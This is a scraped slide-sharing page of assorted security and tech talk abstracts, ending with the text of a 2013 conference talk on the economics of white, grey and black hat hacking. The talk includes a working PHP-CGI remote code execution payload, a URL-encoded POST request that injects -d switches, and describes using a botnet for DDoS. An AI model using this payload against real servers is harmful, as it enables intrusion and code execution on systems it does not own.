WordPress Security Implementation Guideline - Presentation for OWASP Romania ...Dan Vasile
This project aims for a unified approach on WordPress security design and implementation. It is definitely more than a checklist, it's a guide for secure implementation and an invitation to consider and to analyze each individual case.
There is a long list of recommended resources for securing aspects of the WordPress implementation. The project is aimed to offer open source or free resources instead of commercial ones. Some plugins have a free version and a paid one that offers extra functionality. In such cases, the focus of the project was on the free version.
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
This presentation was given at the SANS Rpcky Mountain Conference in Denver, CO June 2014. The presentation had a rather large portion that was demo. That is not captured here. Sorry.
Talk on Securing WordPress site at WordCamp Nepal 2012. I will be covering Top 10 Myths That We Live By and Building Secure WordPress Sites in Simple 10 Steps. Watch Video at http://wordpress.tv/2013/02/26/sakin-shrestha-building-secure-wordpress-sites/
WordPress security & performance a beginners guideMickey Mellen
We will cover how to create a secure WordPress environment, including an overview of security plugins, and backup solutions. We’ll provide numerous tips to help you keep your WordPress environments secure.
We’ll also cover some introductory WordPress performance settings. This will not be a very technical or detailed overview, but will include tips and techniques that most WordPress users can follow to improve their site’s performance.
WordPress Security Implementation Guideline - Presentation for OWASP Romania ...Dan Vasile
This project aims for a unified approach on WordPress security design and implementation. It is definitely more than a checklist, it's a guide for secure implementation and an invitation to consider and to analyze each individual case.
There is a long list of recommended resources for securing aspects of the WordPress implementation. The project is aimed to offer open source or free resources instead of commercial ones. Some plugins have a free version and a paid one that offers extra functionality. In such cases, the focus of the project was on the free version.
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
This presentation was given at the SANS Rpcky Mountain Conference in Denver, CO June 2014. The presentation had a rather large portion that was demo. That is not captured here. Sorry.
Talk on Securing WordPress site at WordCamp Nepal 2012. I will be covering Top 10 Myths That We Live By and Building Secure WordPress Sites in Simple 10 Steps. Watch Video at http://wordpress.tv/2013/02/26/sakin-shrestha-building-secure-wordpress-sites/
WordPress security & performance a beginners guideMickey Mellen
We will cover how to create a secure WordPress environment, including an overview of security plugins, and backup solutions. We’ll provide numerous tips to help you keep your WordPress environments secure.
We’ll also cover some introductory WordPress performance settings. This will not be a very technical or detailed overview, but will include tips and techniques that most WordPress users can follow to improve their site’s performance.
Presentation about how everyone, no matter what their role in securing an organizing is, can make a difference. Sometimes it is about taking a little vulnerability like the IIS Tilde Directory Enumeration vulnerability and making a better exploitation tool. Or perhaps contributing in other ways.
WordPress Security Presentation by Jason Conroy (from Finding Simple - http://findingsimple.com) for the March 2013 WordPress Canberra Meetup (http://wpcanberra.com.au)
You always think it will never happen to you but when it does, it’s all hands on deck. My personal site was almost hacked and since then I actively looked at what I could improve. During this talk I will talk what I had before and show all the improvements I made since then. It will be a mixed of using using the existing tools and my own creation in managing my sites.
Have you ever dreamed of getting paid to hack?!
As a Bug Hunter, this is what its all about, you hack and find vulnerabilities in software and websites, then end up with profit and fame.
In this session, I will explain to you how to start your journey in bug hunting, Are you ready?
Its all about WordPress security, how you can protect your WordPress setup.
Content:
Security Statistics
Security tips
Recommended plugins and services
Presented on April 14, 2018 at CarolinaCon (https://www.carolinacon.org). This talk will provide a quick overview honeypots, an explanation of the cyber deception space, and the benefits of implementing deception as part of your cyber defense program. In addition, this talk will highlight the HoneyDB project, which enables anyone to get started with operating deception sensors and start collecting threat information. Finally, this presentation will describe how I built scalable honeypot sensor collection, employing a "Frankenstein Cloud Architecture", for minimal cost.
Presentation about how everyone, no matter what their role in securing an organizing is, can make a difference. Sometimes it is about taking a little vulnerability like the IIS Tilde Directory Enumeration vulnerability and making a better exploitation tool. Or perhaps contributing in other ways.
WordPress Security Presentation by Jason Conroy (from Finding Simple - http://findingsimple.com) for the March 2013 WordPress Canberra Meetup (http://wpcanberra.com.au)
You always think it will never happen to you but when it does, it’s all hands on deck. My personal site was almost hacked and since then I actively looked at what I could improve. During this talk I will talk what I had before and show all the improvements I made since then. It will be a mixed of using using the existing tools and my own creation in managing my sites.
Have you ever dreamed of getting paid to hack?!
As a Bug Hunter, this is what its all about, you hack and find vulnerabilities in software and websites, then end up with profit and fame.
In this session, I will explain to you how to start your journey in bug hunting, Are you ready?
Its all about WordPress security, how you can protect your WordPress setup.
Content:
Security Statistics
Security tips
Recommended plugins and services
Presented on April 14, 2018 at CarolinaCon (https://www.carolinacon.org). This talk will provide a quick overview honeypots, an explanation of the cyber deception space, and the benefits of implementing deception as part of your cyber defense program. In addition, this talk will highlight the HoneyDB project, which enables anyone to get started with operating deception sensors and start collecting threat information. Finally, this presentation will describe how I built scalable honeypot sensor collection, employing a "Frankenstein Cloud Architecture", for minimal cost.
Public facing web sites are constantly under attack and keeping websites protected is an arms race, yet security rarely gets a look-in at specification and budget allocation stages of delivering a web site - or at best is an afterthought. Yet everyone has an expectation of security and QOS that implies it is central to every project.
Security considerations should pervade all stages of a project from initial specification, throughout development and testing and on to ongoing hosting and maintenance.
In this session I will cover:
* Common threats to web security with real world case studies of compromised sites,
* Simple approaches to mitigating common threats/vulnerabilities,
* Defence in depth – an overview of the various components of web security,
* Drupal specific measures that standard penetration testing often does not account for.
* An overview of how to benefit from:
* Security monitoring and log analysis
* Intrusion Detection Systems & Firewalls
* Security headers and Content Security Policies (CSP).
Comments: https://joind.in/talk/8bbea
Presented on May 9, 2018 at SOURCE Conference Boston
(https://sourceconference.com/events/bos18/).
This version contains minor updates from previous presentations.
This talk will provide a quick overview honeypots, an explanation of the cyber deception space, and the benefits of implementing deception as part of your cyber defense program. In addition, this talk will highlight the HoneyDB project, which enables anyone to get started with operating deception sensors and start collecting threat information. Finally, this presentation will describe how I built scalable honeypot sensor collection, employing a "Frankenstein Cloud Architecture", for minimal cost.
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Mazin Ahmed
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and Abroad
http://blog.mazinahmed.net/2016/10/bug-bounty-hunting-swiss-cyber-storm.html
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Search and Society: Reimagining Information Access for Radical FuturesBhaskar Mitra
The field of Information retrieval (IR) is currently undergoing a transformative shift, at least partly due to the emerging applications of generative AI to information access. In this talk, we will deliberate on the sociotechnical implications of generative AI for information access. We will argue that there is both a critical necessity and an exciting opportunity for the IR community to re-center our research agendas on societal needs while dismantling the artificial separation between the work on fairness, accountability, transparency, and ethics in IR and the rest of IR research. Instead of adopting a reactionary strategy of trying to mitigate potential social harms from emerging technologies, the community should aim to proactively set the research agenda for the kinds of systems we should build inspired by diverse explicitly stated sociotechnical imaginaries. The sociotechnical imaginaries that underpin the design and development of information access technologies needs to be explicitly articulated, and we need to develop theories of change in context of these diverse perspectives. Our guiding future imaginaries must be informed by other academic fields, such as democratic theory and critical theory, and should be co-developed with social science scholars, legal scholars, civil rights and social justice activists, and artists, among others.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
1. DOES IT PAY TO BE A
BLACKHAT HACKER?
DefCamp Romania – November 29, 2013
Speaker: Dan Catalin VASILE
2. About me
• Information Security Consultant
• OWASP Romania Board Member
• InfoSec Researcher / Writer / Presenter
dan@pentest.ro
http://www.pentest.ro
3. Agenda
•
•
•
•
What is a hacker?
Different types of hats
A real world vulnerability
Exploitation
– White
– Grey
– Black
• Gains and risks
• Conclusion
4. What is a hacker?
Original definition (MIT 1960s & RFC 1392)
A person who delights in having an intimate
understanding of the internal workings of a system,
computers and computer networks in particular.
Main-stream media definition & general public
acceptance (also in RFC 1392)
Mass media and general public's usage of the word
hacker refers to security breakers motivated mainly by
financial gains.
Hackers may be motivated by a multitude of reasons,
such as profit, protest, or challenge.
5. Different kinds of hats
White hat
An ethical computer hacker, or a computer security expert, who
specializes in penetration testing and in other testing
methodologies to ensure the security of an organization's
information systems.
Grey hat
A skilled hacker whose activities fall somewhere between white
and black hat hackers in a variety of practices. Sometimes he acts
illegally, though in good will, to identify vulnerabilities in
computing processes.
Black hat
A hacker who violates computer security for little reason beyond
maliciousness or for personal gain.
6. A real world vulnerability
Apache Web Server :: remote code execution
Where?
In the default installation of php5-cgi package.
The problem
PHP-CGI-based setups contain a vulnerability when parsing query
string parameters from php files.
Description
When the php-cgi receives a processed query string parameter as
command line arguments which allows command-line switches,
such as -s, -d or -c to be passed to the php-cgi binary, which can
be exploited to disclose source code and obtain arbitrary code
execution.
7. A real world vulnerability
Apache Web Server :: remote code execution
The vulnerability
In the source code file sapi/cgi/cgi_main.c of PHP we can see that
the security check is done when the php.ini configuration setting
cgi.force_redirect is set and the php.ini configuration setting
cgi.redirect_status_env is set to NULL.
STD_PHP_INI_ENTRY("cgi.force_redirect","1", PHP_INI_SYSTEM, OnUpdateBool,force_redirect,
php_cgi_globals_struct, php_cgi_globals)
STD_PHP_INI_ENTRY("cgi.redirect_status_env", NULL, PHP_INI_SYSTEM, OnUpdateString,
redirect_status_env, php_cgi_globals_struct, php_cgi_globals)
It is possible to set cgi.force_redirect to zero and
cgi.redirect_status_env to zero using the -d switch so that php-cgi
gets fully executed and we can use the payload in the POST data
field to execute arbitrary php.
8. A real world vulnerability
Apache Web Server :: remote code execution
Impact!!!
A remote unauthenticated attacker could obtain sensitive
information, cause a denial of service condition or may be able to
execute arbitrary code with the privileges of the web server.
9. A real world vulnerability
Apache Web Server :: remote code execution
Exploitation PoC
char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F"
"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64"
"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73"
"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E"
"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63"
"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62"
"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74"
"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68"
"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F"
"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63"
"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73"
"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1rn"
"Host: %srn"
"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26"
"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25rn"
"Content-Type: application/x-www-form-urlencodedrn"
"Content-Length: %drn"
"Connection: closernrn%s";
-d
allow_url_include=on
-d
safe_mode=off
-d
suhosin.simulation=on
-d
disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d
cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
10. A real world vulnerability
Apache Web Server :: remote code execution
Show me the numbers
12. What are the options?
Responsible disclosure
- Let Apache know about the problem
- Let them fix it
- Allow “some” time for the patch to be installed on most (??)
of the systems
- Make the public announcement and get the credit
- For some cash you can make Google pay for it
A list of bug bounties programs:
https://bugcrowd.com/list-of-bug-bounty-programs/
13. What are the options?
Sell the vulnerability to a broker
- TippingPoint's Zero-Day Initiative
- iDefense's Vulnerability Contributor Program
- Vupen’s Threat Protection Program
14. What are the options?
Exploit it on your own!
- Small scale
-
A few selected targets
- Very large scale
-
Internet size attack
Create a botnet of servers
15. White Hat Alice
Employer: big consulting corporation
Annual net income: ~$80.000
Approach:
- Responsible disclosure
Gains:
- Fame
- ~$3k / reporting the vulnerability
https://www.google.com/about/appsecurity/patch-rewards/
Risks:
- Mainly risk free
16. Grey Hat Bob
Employer: small web-hosting provider
Annual net income: ~$45.000
Approach:
-
Exploit it on a small scale
Sell it to a broker
Disclose it anonymously
Gains:
-
No fame, just some fortune
$50k from the broker
~$15k / year
Risks:
-
Legal charges for hacking
17. Black Hat Mallory
Employer: self-employed/freelancer
Annual net income: ~$20.000
Approach:
-
Exploit it on a ‘never-seen’ scale
Phase 1
19. Black Hat Mallory
Uses for the botnet
•
•
•
•
•
•
•
•
Distributed Denial-of-Service Attacks
Spamming
Sniffing Traffic
Spreading new malware
Advertisement services abuse
Manipulating pools/games/etc
Mass identity theft
Many others
20. Black Hat Mallory
DDOS
Market price:
$200/10k bots/day
Mallory’s price?
~200k/day/client
Multiple clients
He can literally make millions every day.
22. Black Hat Mallory
Risks?
Besides being the most wanted cyber-criminal ever?
Going to jail!
Side thoughts
- He only uses Bitcoins or alternative untraceable payment
options
- He uses money mules to cash out
- The botnet gets divided
- He moves to a country with no extradition treaty
23. Aftermath
It takes months (years?) for the Internet to recover after such a
breach.
Patching, releasing, clean install, removing all the infections is a
painfully long process since the botnet tries to reactivate.
What was real and what was not?
- Apache PHP Vulnerability – REAL
- PoC – REAL
- the impact – not so real
-Black-hat exploitation – science-fiction, yet doable
Hi everybody. My name is Dan Vasile and today we’re going to talk about money! More specifically, the economics behind the hacking scenes. We don’t have much time to go over all the aspects, but we should set the ground for a proper understanding of the subject.The whole idea behind this talk is to see if we need to make a change in our careers and change the hats. I am very keen to find out if being on the dark side really pays off and what it takes to be black.
First things first, a little bit about myself. I have to set the proper background here, since I’ve asked the all important question: Does it pay to be black?I am and have been for some time now, a consultant in the InfoSec world. I’m also a board member of OWASP Romania, which is becoming a great place for exchanging information security ideas and not only those related to web applications, but rather all sort of applications. I invite you to join the group and the regular meetings, just search for OWASP Romania and you’ll find us. You’ll also find me with my colleagues at launch time outside the conference room, presenting OWASP projects. Come there for chatting with us.I’ve been involved in information security research, I publish on my blog and I present at conferences. Just like I do now.